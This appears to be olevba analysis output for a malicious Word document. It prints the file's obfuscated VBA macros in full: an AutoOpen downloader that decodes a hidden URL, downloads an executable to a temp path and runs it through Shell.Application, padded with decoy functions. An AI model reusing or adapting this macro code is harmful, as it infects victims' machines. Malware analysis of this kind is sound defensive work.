Malicious Word macro

1. olevba 0.25 - http://decalage.info/python/oletools
2. Flags       Filename                                                        
3. ----------- -----------------------------------------------------------------
4. OLE:MAS---- mickgeorge.doc
5.  
6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
7.  
8. ===============================================================================
9. FILE: mickgeorge.doc
10. Type: OLE
11. -------------------------------------------------------------------------------
12. VBA MACRO ThisDocument.cls
13. in file: mickgeorge.doc - OLE stream: u'Macros/VBA/ThisDocument'
14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
15. Sub autoopen()
16. atqk_x482mp6v
17. End Sub
18. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
19. ANALYSIS:
20. +----------+----------+---------------------------------------+
21. | Type     | Keyword  | Description                           |
22. +----------+----------+---------------------------------------+
23. | AutoExec | AutoOpen | Runs when the Word document is opened |
24. +----------+----------+---------------------------------------+
25. -------------------------------------------------------------------------------
26. VBA MACRO Module1.bas
27. in file: mickgeorge.doc - OLE stream: u'Macros/VBA/Module1'
28. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
29.  
30. Public Function wUmMnysKtPzKQMYpELM(CLjPtJqwPYMso As String) As String
31.  
32. Dim nwwuzQelPc As Integer
33. For nwwuzQelPc = 0 To 0
34. If nwwuzQelPc = 5 Then End
35. Next nwwuzQelPc
36. Dim rUkQQqyoTO As Integer
37. For rUkQQqyoTO = 0 To 0
38. If rUkQQqyoTO = 5 Then End
39. Next rUkQQqyoTO
40. Dim jHzvHYnIwFd As Integer
41. For jHzvHYnIwFd = 0 To 0
42. If jHzvHYnIwFd = 5 Then End
43. Next jHzvHYnIwFd
44. For mrdVdHiTjnq = 1 To Len(CLjPtJqwPYMso) Step 2
45. Dim lvBxJabwy As Integer
46. For lvBxJabwy = 0 To 0
47. If lvBxJabwy = 5 Then End
48. Next lvBxJabwy
49. Dim DrdEbaB As Integer
50. For DrdEbaB = 0 To 0
51. If DrdEbaB = 5 Then End
52. Next DrdEbaB
53. Dim luGjCiFYkYOhfBlvBxJabw As Integer
54. For luGjCiFYkYOhfBlvBxJabw = 0 To 0
55. If luGjCiFYkYOhfBlvBxJabw = 5 Then End
56. Next luGjCiFYkYOhfBlvBxJabw
57.  
58. Dim CwOLiEd As Integer
59. For CwOLiEd = 0 To 0
60. If CwOLiEd = 5 Then End
61. Next CwOLiEd
62. Dim CiFYkY As Integer
63. For CiFYkY = 0 To 0
64. If CiFYkY = 5 Then End
65. Next CiFYkY
66. Dim jAmrQrCwO As Integer
67. For jAmrQrCwO = 0 To 0
68. If jAmrQrCwO = 5 Then End
69. Next jAmrQrCwO
70. wUmMnysKtPzKQMYpELM = wUmMnysKtPzKQMYpELM & Mid(CLjPtJqwPYMso, mrdVdHiTjnq, 1)
71. Dim dSVNmPusaOj As Integer
72. For dSVNmPusaOj = 0 To 0
73. If dSVNmPusaOj = 5 Then End
74. Next dSVNmPusaOj
75. Dim TjbLtvPsKVqDrdEb As Integer
76. For TjbLtvPsKVqDrdEb = 0 To 0
77. If TjbLtvPsKVqDrdEb = 5 Then End
78. Next TjbLtvPsKVqDrdEb
79. Dim eCgKvq As Integer
80. For eCgKvq = 0 To 0
81. If eCgKvq = 5 Then End
82. Next eCgKvq
83.  
84. Dim lAHJSqlOQxDQ As Integer
85. For lAHJSqlOQxDQ = 0 To 0
86. If lAHJSqlOQxDQ = 5 Then End
87. Next lAHJSqlOQxDQ
88. Dim aQtPotqBET As Integer
89. For aQtPotqBET = 0 To 0
90. If aQtPotqBET = 5 Then End
91. Next aQtPotqBET
92. Dim DziwVVw As Integer
93. For DziwVVw = 0 To 0
94. If DziwVVw = 5 Then End
95. Next DziwVVw
96. Next
97. Dim QRGbRI As Integer
98. For QRGbRI = 0 To 0
99. If QRGbRI = 5 Then End
100. Next QRGbRI
101. Dim YosvmLbSDlnI As Integer
102. For YosvmLbSDlnI = 0 To 0
103. If YosvmLbSDlnI = 5 Then End
104. Next YosvmLbSDlnI
105. Dim ETpqzJEix As Integer
106. For ETpqzJEix = 0 To 0
107. If ETpqzJEix = 5 Then End
108. Next ETpqzJEix
109.  
110. Dim MIUlAHJSql As Integer
111. For MIUlAHJSql = 0 To 0
112. If MIUlAHJSql = 5 Then End
113. Next MIUlAHJSql
114. Dim JgEwsEU As Integer
115. For JgEwsEU = 0 To 0
116. If JgEwsEU = 5 Then End
117. Next JgEwsEU
118. Dim SklGHRpVzP As Integer
119. For SklGHRpVzP = 0 To 0
120. If SklGHRpVzP = 5 Then End
121. Next SklGHRpVzP
122. End Function
123.  
124.  
125.  
126. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
127. ANALYSIS:
128. No suspicious keyword or IOC found.
129. -------------------------------------------------------------------------------
130. VBA MACRO Module2.bas
131. in file: mickgeorge.doc - OLE stream: u'Macros/VBA/Module2'
132. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
133. Public Function CBGrxFVwvLB()
134.  
135. End Function
136. Private Sub ydbIxRHyMQFFstTpRlPo()
137.  
138. End Sub
139. Private Sub DxPMkTekgsI()
140.  
141. End Sub
142. Public Sub qNvYoU()
143.  
144. End Sub
145. Private Sub rYSSRQHAHmM()
146.  
147. End Sub
148. Public Function UMlOtdZNiZPdnV()
149.  
150. End Function
151. Public Sub QtFTBSEIj()
152.  
153. End Sub
154. Private Function geAVuAwILavxG()
155.  
156. End Function
157. Public Function EQrKEuajinYQYCPfildBQJuceybg()
158.  
159. End Function
160. Private Sub maLnJIkRjUZzalf()
161.  
162. End Sub
163. Private Function mLDzKcrMAJhcFH()
164.  
165. End Function
166. Public Sub VKqzAyDbhoSgfzBtSiaKsu()
167.  
168. End Sub
169. Private Function ifNbAAckxZtYwN()
170.  
171. End Function
172. Private Function TmUrb()
173.  
174. End Function
175. Public Function zQgnpyVQ()
176.  
177. End Function
178. Public Function jCKzf()
179.  
180. End Function
181. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
182. ANALYSIS:
183. No suspicious keyword or IOC found.
184. -------------------------------------------------------------------------------
185. VBA MACRO dfsdfsdffdgdhbvdfe3.bas
186. in file: mickgeorge.doc - OLE stream: u'Macros/VBA/dfsdfsdffdgdhbvdfe3'
187. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
188. #If VBA7 Then
189.     Private Declare PtrSafe Function àðàâàûâà Lib "urlmon" Alias _
190.     "URLDownloadToFileA" (ByVal UYG78t78GIUsfgd As LongPtr, _
191.     ByVal UYG78t78GIUsfg As String, _
192.     ByVal UYG78t78GIUsfgf As String, _
193.     ByVal UYG78t78GIUsfgfd As Long, _
194.     ByVal UYG78t78GIUsfgfds As LongPtr) As LongPtr
195. #Else
196.     Private Declare Function àðàâàûâà Lib "urlmon" Alias _
197.     "URLDownloadToFileA" (ByVal UYG78t78GIUsfgd As Long, _
198.     ByVal UYG78t78GIUsfg As String, _
199.     ByVal UYG78t78GIUsfgf As String, _
200.     ByVal UYG78t78GIUsfgfd As Long, _
201.     ByVal UYG78t78GIUsfgfds As Long) As Long
202. #End If
203.  
204. Function îãøïãøùèäàâ(z0ktwRXRQZl2qo0_ As String, âàûâàûâïóê As String) As Boolean
205. vJHKBJdfkgfg = àðàâàûâà(0&, z0ktwRXRQZl2qo0_, âàûâàûâïóê, 0&, 0&)
206. Set âûïàâïàâóöà = CreateObject(Chr$(83) & Chr$(104) & Chr$(101) & Chr$(108) & Chr$(108) & Chr$(46) & Chr$(65) & Chr$(112) & Chr$(112) & Chr$(108) & Chr$(105) & Chr$(99) & Chr$(97) & Chr$(116) & Chr$(105) & Chr$(111) & Chr$(110))
207. âûïàâïàâóöà.Open Environ(wUmMnysKtPzKQMYpELM(Chr$(84) & Chr$(57) & Chr$(77) & Chr$(104) & Chr$(80) & Chr$(38))) & wUmMnysKtPzKQMYpELM(Chr$(92) & Chr$(61) & Chr$(51) & Chr$(39) & Chr$(50) & Chr$(134) & Chr$(52) & Chr$(122) & Chr$(50) & Chr$(57) & Chr$(51) & Chr$(51) & Chr$(53) & Chr$(95) & Chr$(50) & Chr$(64) & Chr$(51) & Chr$(84) & Chr$(53) & Chr$(96) & Chr$(46) & Chr$(88) & Chr$(101) & Chr$(111) & Chr$(120) & Chr$(44) & Chr$(101) & Chr$(45))
208. End Function
209.  
210.  
211.  
212.  
213.  
214.  
215.  
216. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
217. ANALYSIS:
218. +------------+--------------------+-----------------------------------------+
219. | Type       | Keyword            | Description                             |
220. +------------+--------------------+-----------------------------------------+
221. | Suspicious | CreateObject       | May create an OLE object                |
222. | Suspicious | Lib                | May run code from a DLL                 |
223. | Suspicious | Open               | May open a file                         |
224. | Suspicious | Environ            | May read system environment variables   |
225. | Suspicious | Chr                | May attempt to obfuscate specific       |
226. |            |                    | strings                                 |
227. | Suspicious | URLDownloadToFileA | May download files from the Internet    |
228. +------------+--------------------+-----------------------------------------+
229. -------------------------------------------------------------------------------
230. VBA MACRO Class1.cls
231. in file: mickgeorge.doc - OLE stream: u'Macros/VBA/Class1'
232. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
233.  
234. Private Function vzBtSi()
235.  
236. End Function
237. Public Sub uOrwJGpC()
238.  
239. End Sub
240. Private Sub LZAUzYpPqBv()
241.  
242. End Sub
243. Public Function DNTPcsHOQaxsVY()
244.  
245. End Function
246. Private Function mbGCC()
247.  
248. End Function
249. Public Sub xFVwvLBE()
250.  
251. End Sub
252. Public Function dbIxRHyMQF()
253.  
254. End Function
255. Private Sub TdpRlPoGR()
256.  
257. End Sub
258. Private Sub PMkTekgsIJ()
259.  
260. End Sub
261. Private Function NvYoUbuCYSSRQHAH()
262.  
263. End Function
264. Private Sub ORUMlOtdZN()
265.  
266. End Sub
267. Private Sub dnVVJvQtFTBSE()
268.  
269. End Sub
270. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
271. ANALYSIS:
272. No suspicious keyword or IOC found.
273. -------------------------------------------------------------------------------
274. VBA MACRO Module3.bas
275. in file: mickgeorge.doc - OLE stream: u'Macros/VBA/Module3'
276. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
277. (empty macro)
278. -------------------------------------------------------------------------------
279. VBA MACRO Module4.bas
280. in file: mickgeorge.doc - OLE stream: u'Macros/VBA/Module4'
281. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
282. Public Function NiZPdnVVJvQtFTB()
283.  
284. End Function
285. Private Sub jQTNgeAVuAwI()
286.  
287. End Sub
288. Private Function xGQLpEQrK()
289.  
290. End Function
291. Private Function jkinY()
292.  
293. End Function
294. Private Sub POfildBQJuc()
295.  
296. End Sub
297. Public Function gtDZmLnJIk()
298.  
299. End Function
300. Public Sub ZzalfxuQmLDzKcr()
301.  
302. End Sub
303. Private Sub hcFHoHNVKqzA()
304.  
305. End Sub
306. Public Function hoSgf()
307.  
308. End Function
309. Public Function tSiaKsuOrwGpCccDLZAUzY()
310.  
311. End Function
312. Private Function BvNwTDNT()
313.  
314. End Function
315. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
316. ANALYSIS:
317. No suspicious keyword or IOC found.
318. -------------------------------------------------------------------------------
319. VBA MACRO Module5.bas
320. in file: mickgeorge.doc - OLE stream: u'Macros/VBA/Module5'
321. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
322. Sub atqk_x482mp6v()
323. îãøïãøùèäàâ wUmMnysKtPzKQMYpELM("hltEt<p=::/C/'s4cAhal1a/gNh;a@u0f`e4ro.kdHe2/ZjGs5/PbdiCnB.*e*x^eo"), Environ(wUmMnysKtPzKQMYpELM("T9MhP&")) & wUmMnysKtPzKQMYpELM("\=3'2†4z29335_2@3T5`.Xeox,e-")
324. End Sub
325.  
326. Public Function ILavxGQLp()
327.  
328. End Function
329. Private Sub KEuajkin()
330.  
331. End Sub
332. Private Sub CPOfildBQJuceyb()
333.  
334. End Sub
335. Private Sub ZmaLnJIkRjU()
336.  
337. End Sub
338. Private Sub lfxuQ()
339.  
340. End Sub
341. Private Function zKcrMAJhcFH()
342.  
343. End Function
344. Public Function VKqzAyDbhoSgf()
345.  
346. End Function
347. Public Function tSiaKsuOrw()
348.  
349. End Function
350. Private Function CccDLZAU()
351.  
352. End Function
353. Private Function PqBvNwTD()
354.  
355. End Function
356. Public Sub csHOQaxsVYEKe()
357.  
358. End Sub
359. Public Function CCBGrxFVwvLB()
360.  
361. End Function
362. Public Sub ydbIxRHyMQFFstT()
363.  
364. End Sub
365. Public Function lPoGRGDxPMkTek()
366.  
367. End Function
368. Private Function JfhqNvYoUbuC()
369.  
370. End Function
371. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
372. ANALYSIS:
373. +------------+---------+---------------------------------------+
374. | Type       | Keyword | Description                           |
375. +------------+---------+---------------------------------------+
376. | Suspicious | Environ | May read system environment variables |
377. +------------+---------+---------------------------------------+
378. -------------------------------------------------------------------------------
379. VBA MACRO Class2.cls
380. in file: mickgeorge.doc - OLE stream: u'Macros/VBA/Class2'
381. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
382.  
383. Public Function EQrKEuajinYQYCP()
384.  
385. End Function
386. Public Function ldBQJu()
387.  
388. End Function
389. Public Function bgtDZmaLnJ()
390.  
391. End Function
392. Public Sub jUZzalfxuQmLDz()
393.  
394. End Sub
395. Private Sub MAJhcFHo()
396.  
397. End Sub
398. Private Function KqzAyDbhoSgfvzB()
399.  
400. End Function
401. Public Sub aKsuOr()
402.  
403. End Sub
404. Private Function pCccDLZAUzYp()
405.  
406. End Function
407. Public Function vNwTDNTPcs()
408.  
409. End Function
410. Private Sub axsVYEKembGCCB()
411.  
412. End Sub
413. Private Function FVwvLBEwUy()
414.  
415. End Function
416. Private Function xRHyMQFFstTd()
417.  
418. End Function
419. Public Function PoGRGDx()
420.  
421. End Function
422. Private Sub TekgsIJ()
423.  
424. End Sub
425. Private Function NvYoUbuCYSSRQHAHMyORUMl()
426.  
427. End Function
428. Public Sub ZNiZPnVVJv()
429.  
430. End Sub
431. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
432. ANALYSIS:
433. No suspicious keyword or IOC found.
434. -------------------------------------------------------------------------------
435. VBA MACRO Class3.cls
436. in file: mickgeorge.doc - OLE stream: u'Macros/VBA/Class3'
437. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
438.  
439. Private Function QFFstTdpRlPoG()
440.  
441. End Function
442. Private Sub xPMkTekgsIJ()
443.  
444. End Sub
445. Private Function NvYoUbuC()
446.  
447. End Function
448. Private Function SRQHAHmMyORUMl()
449.  
450. End Function
451. Private Function ZNiZP()
452.  
453. End Function
454. Public Function VJvQtFTBSEIjQTN()
455.  
456. End Function
457. Private Function VuAwILavxG()
458.  
459. End Function
460. Private Sub EQrKEuaj()
461.  
462. End Sub
463. Private Sub YQYCPOf()
464.  
465. End Sub
466. Private Sub BQJuc()
467.  
468. End Sub
469. Public Sub gtDZm()
470.  
471. End Sub
472. Public Sub JIkRjUZ()
473.  
474. End Sub
475. Private Function fxuQmLD()
476.  
477. End Function
478. Private Function rMAJh()
479.  
480. End Function
481. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
482. ANALYSIS:
483. No suspicious keyword or IOC found.